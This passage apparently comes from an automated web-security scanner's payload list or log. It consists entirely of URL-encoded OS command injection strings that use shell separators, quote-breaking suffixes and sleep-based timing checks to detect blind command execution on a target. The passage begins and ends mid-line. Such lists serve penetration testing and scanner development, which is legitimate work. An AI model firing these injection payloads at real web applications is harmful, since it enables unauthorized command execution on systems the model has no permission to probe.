20%7C\n%7C%20%5B%204%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%205%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%206%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%207%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%208%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%7C%20%5B%209%20-ne%20%24%28echo%20CSMWFN%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20XBWWVF%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%0A%20str%3D%24%28echo%20KEZMWT%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%7C\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%3B%20str%3D%24%28echo%20CHSJVY%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2527\n%7C%20%5B%201%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%202%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%203%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%204%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%205%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%206%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%207%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%208%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%7C%20%5B%209%20-ne%20%24%28echo%20FYXPMZ%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20AYBJIV%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%0A%20str%3D%24%28echo%20OGEKGC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2527\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%3B%20str%3D%24%28echo%20RPPEVG%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2522\n%7C%20%5B%201%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%202%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%203%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%204%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%205%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%206%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%207%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%208%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%7C%20%5B%209%20-ne%20%24%28echo%20JLUGPX%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20NAHLJW%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%0A%20str%3D%24%28echo%20IEZSHQ%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2522\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%3B%20str%3D%24%28echo%20VHBJGH%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%255C%255C\n%7C%20%5B%201%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%202%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%203%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%204%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%205%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%206%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%207%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%208%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%7C%20%5B%209%20-ne%20%24%28echo%20NVIYMO%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20QTRMRJ%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%255C%255C\n%0A%20str%3D%24%28echo%20JTZCSG%29%0A%20str1%3D%24%7